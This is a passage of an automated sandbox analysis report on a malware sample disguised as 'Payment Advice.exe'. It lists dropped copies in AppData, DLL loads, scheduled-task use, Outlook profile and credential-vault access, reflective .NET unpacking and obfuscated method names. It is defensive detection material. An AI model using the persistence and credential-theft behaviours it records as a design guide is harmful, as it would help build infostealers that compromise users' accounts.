                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msvcp140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Payment Advice.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: Payment Advice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Payment Advice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: Payment Advice.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: sFPEKzHsLkYZIz.exe.0.dr, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payment Advice.exe.8ec0000.8.raw.unpack, SQL.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, g45rfxMhkEpawBNuWE.cs.Net Code: wPfj1ZW3Ew System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, g45rfxMhkEpawBNuWE.cs.Net Code: wPfj1ZW3Ew System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_01493AD9 push ebx; retf 0_2_01493ADA
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_05C870C8 pushad ; ret 0_2_05C870D1
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_05C8C207 pushad ; ret 0_2_05C8C20A
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_077A0947 pushad ; retf 0_2_077A0948
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 0_2_077A093D pushad ; retf 0_2_077A093E
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 8_2_00F8B257 push 8BFFFFF7h; ret 8_2_00F8B25D
                    Source: C:\Users\user\Desktop\Payment Advice.exeCode function: 8_2_00F80C3D push edi; ret 8_2_00F80CC2
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 9_2_030B3314 pushfd ; iretd 9_2_030B3351
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 9_2_030B3352 pushfd ; iretd 9_2_030B3351
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 9_2_030B369B push ebx; iretd 9_2_030B36DA
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 9_2_030B3AD9 push ebx; retf 9_2_030B3ADA
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 13_2_00F5B257 push 8BFFFFF7h; ret 13_2_00F5B25D
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeCode function: 13_2_00F50C3D push edi; ret 13_2_00F50CC2
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_0227334D pushfd ; iretd 14_2_02273351
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_022736D3 push ebx; iretd 14_2_022736DA
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_02273AD9 push ebx; retf 14_2_02273ADA
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A50E9B push es; retf 14_2_06A50EB8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A50E00 push es; retf 14_2_06A50E68
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A50E00 push es; retf 14_2_06A50EB8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A50E69 push es; retf 14_2_06A50EB8
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A5093D pushad ; retf 14_2_06A5093E
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06A50947 pushad ; retf 14_2_06A50948
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 14_2_06EE7147 push dword ptr [edx+ebp*2-75h]; iretd 14_2_06EE7157
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_012F0C3D push edi; ret 19_2_012F0CC2
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_06916F81 push es; ret 19_2_06916F90
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 19_2_06911658 push cs; retf 19_2_0691165B
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_053470C8 pushad ; ret 20_2_053470D1
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_0534C207 pushad ; ret 20_2_0534C20A
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 20_2_0534DB32 push esi; retf 20_2_0534DB33
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_01170B4D push edi; ret 25_2_01170CC2
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeCode function: 25_2_01170C95 push edi; retf 25_2_01170C3A
                    Source: Payment Advice.exeStatic PE information: section name: .text entropy: 7.9742405595701085
                    Source: sFPEKzHsLkYZIz.exe.0.drStatic PE information: section name: .text entropy: 7.9742405595701085
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, aBMIJsI2GFRlsegvHA.csHigh entropy of concatenated method names: 'jLwgRvxbS4', 'qtDgnhTgtc', 'SANgr2Ee97', 'pTZgNVKc7T', 'NgXgUheTv6', 'z4agKW03ii', 'rwcgdykN4B', 'llogtLOOOO', 'cuNgOAOhrv', 'aAYgTWvfo8'
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, g45rfxMhkEpawBNuWE.csHigh entropy of concatenated method names: 'yBKDYVWIhW', 'SJhDRJNBnS', 'NF2Dnigk2X', 'okVDrSXdd0', 'N0fDNXe9Xh', 'dfIDU7Sk7j', 'dX0DK1HM03', 'zVbDdPPkjF', 'O86DtmwZMw', 'RwPDOtR8YE'
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, TSuJXh688KCvDRA8xS.csHigh entropy of concatenated method names: 'ei3pKoIYfr', 'moCpdXr3Ju', 'O1CpOZBwDQ', 'RUrpTogNg1', 'WUGpJ7YNyd', 'bxVpwYleWS', 'kvoueXMOm5Q1SmlxXi', 'pYhjSI0urU5QYksA49', 'n5FppYHYrI', 'fL6pDlm01c'
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, TfJtmBfwbVKTZLpqD3.csHigh entropy of concatenated method names: 'cmAr0bSsRt', 'jb8rvNqRO3', 'RRCrMjmfw5', 'B2VrIZ2GEj', 'eLKrJ85HTQ', 'MaQrwqQAhW', 'qPtr5xBcwx', 'VkhrgGY6v5', 'VwVr7uORve', 'TTorijefRO'
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, z3JXvXmmMR8LABifXF.csHigh entropy of concatenated method names: 'MNe1UwKM8', 'D6N0kRAP7', 'n5Nv7Lvc4', 'DO2GxDV12', 'MefIijA26', 'PqUsMIlAE', 'TgxKcq6CEY0ShNRXym', 'MjV50ZBx5Zq2lxQjva', 'vKngh5OxF', 'KkYigsO3F'
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, sOMv7bgiRmU007FApa.csHigh entropy of concatenated method names: 'uxI7pdRerW', 'HS07DnctEt', 'sj97jh8vvR', 'gRd7Rxg9Vm', 'hkl7nmacGN', 'jYW7NTWrIn', 'Gmx7UlikXw', 'kyGgasyxi0', 'DkygcDjI6M', 'T4mgQ3hN3S'
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, vMCUf22TOWfFJfIcQU.csHigh entropy of concatenated method names: 'ToString', 'tpPwyaLUNI', 'bMAw3AS9yd', 'ndfwBIdFbJ', 'zOtwEA1J0w', 'SS3w2cgs2Y', 'Tdjw652ika', 'zOqwPuc6uh', 'eG8weVRuAx', 'H21wqdTjxY'
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, k8kSUDwarKJEU7Xa30.csHigh entropy of concatenated method names: 'cOinLdtRg7', 'N8Vn99vQp1', 't2JnXoI9PJ', 'F3LnkQnQYw', 'VI3nfVBOZx', 'aB5nVZh6tY', 'e6InaMotY4', 'S1ZncZOoVc', 'mdqnQYRYc0', 'Q9rnHsRZVk'
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, nUo34hz6QsbQPWCtYV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'oZy7ZuOZdh', 'FWt7JYvoRg', 'wjl7wQmbUc', 'Xsr75Vv6EA', 'AFp7gSTXWF', 'QYV7726pVb', 'W4F7i0edYs'
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, UpQHmstwEVKTgZGGgR.csHigh entropy of concatenated method names: 'Gh0NS2uFRD', 'tWYNGuX9kt', 'UstrBb7lVZ', 'tkVrEhSfu4', 'rdsr27Em69', 'gmTr6YJNgn', 'h8ZrPeZPs8', 'UiJreXQnoS', 'Hv4rqxQpdc', 'XbGroxSHiR'
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, Ex8GEybODp9w5PDMiRh.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kUfiLr5uGy', 'IPmi9u4sj5', 'mJMiXU84Nf', 'PWVikZ5nQa', 'IDuif2GqVH', 'zHqiV9myaw', 'Je0iauMVCy'
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, Hv2PvdJu2lR4hIVvn9.csHigh entropy of concatenated method names: 'iwLZMud7uP', 'RUdZInlfp1', 'IN2ZWbGKQc', 'U5MZ3DRTY8', 'RL6ZESwAmq', 'ad0Z2B80qB', 'cWCZPHbtEI', 'MV0ZeYUTBW', 'NPCZoscrYR', 'REqZyTb42W'
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, xuq9NBsGj38hal6MpI.csHigh entropy of concatenated method names: 'jwKJoN0f0d', 'LlpJu8rK3y', 'eZ1JLCAD8k', 'C3ZJ9mFGtU', 'UP7J3LBteg', 'GByJBpH2q4', 'ltdJE9TvBX', 'fULJ2gL56I', 'TQlJ6hldem', 'YylJPdQbbM'
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, YyZUO9b5whwYWTkytbE.csHigh entropy of concatenated method names: 'n7E7AN38Ju', 'AE47bDETub', 'n0d71JW0Gq', 'XH670cjHVD', 'EGk7SqTiL9', 'rXa7vlnPfG', 'x2P7GteEOf', 'lPA7MhYVP0', 'aFv7I5cZDZ', 'Gcb7scQDcK'
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, NFWBpM4mPw4rlyE4h1.csHigh entropy of concatenated method names: 'Dispose', 'lpEpQ1CnJM', 't5E43ZeSb2', 'VffCCYlVy8', 'jrmpHDpc1L', 'zTVpzdcr92', 'ProcessDialogKey', 'PgS4mecuej', 'hiE4pDjYxQ', 'LhM441QNTV'
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, ts6Ukvnuhx7ka3epjf.csHigh entropy of concatenated method names: 'GHOUY12Ajx', 'OF8UnsDkYr', 'jAVUNidD8v', 'BEcUKYphPP', 'WBDUdmyZq7', 'osFNfHstVe', 'y9BNVShpwK', 'y7LNavY12Y', 'tQXNcHHQEN', 'XOGNQci9Xv'
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, TSrMHgQjhmviKA4M93.csHigh entropy of concatenated method names: 'sGUgWoCEnA', 'ievg3O9Nrf', 'LjwgBGsBVp', 'SovgEiU8UR', 'So0gLsL5K4', 'xIVg2T2kpi', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, tkbEV7bmUUsmCjO133w.csHigh entropy of concatenated method names: 'ExhiAtJOME', 'PC6ibDYElD', 'orqi112ZO4', 'MoOU4OH55avXSJHmnje', 'wef3TbH6JcQpvxPO8cu', 'cc2oJbHB9wjNZ4VtfLs', 'kcRKjkHleDArZJiy7SF'
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, sF7EofuwR9Zd9VpvII.csHigh entropy of concatenated method names: 'ontKRjRhsJ', 'o08KrFXwAs', 'p8nKUVLpdQ', 'Ef8UHHFFmC', 'eKUUzXSbZD', 'wqeKmgvEsT', 'XfVKp07PQi', 'F2lK4CwnMy', 'aAUKDRpAhP', 'nlYKjOTQIF'
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, O1vH9MdC9n3P7LT7AU.csHigh entropy of concatenated method names: 'zXnKAXlb9g', 'unNKbJfRrG', 'l3KK15klMu', 'NVgK0r2oib', 'A4bKSHd9B5', 'vXeKv8nqgu', 'ymBKGJwnDZ', 'rp9KMU3cT7', 'jP2KI85I6H', 'h58KsPiTvr'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, aBMIJsI2GFRlsegvHA.csHigh entropy of concatenated method names: 'jLwgRvxbS4', 'qtDgnhTgtc', 'SANgr2Ee97', 'pTZgNVKc7T', 'NgXgUheTv6', 'z4agKW03ii', 'rwcgdykN4B', 'llogtLOOOO', 'cuNgOAOhrv', 'aAYgTWvfo8'
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, g45rfxMhkEpawBNuWE.csHigh entropy of concatenated method names: 'yBKDYVWIhW', 'SJhDRJNBnS', 'NF2Dnigk2X', 'okVDrSXdd0', 'N0fDNXe9Xh', 'dfIDU7Sk7j', 'dX0DK1HM03', 'zVbDdPPkjF', 'O86DtmwZMw', 'RwPDOtR8YE'
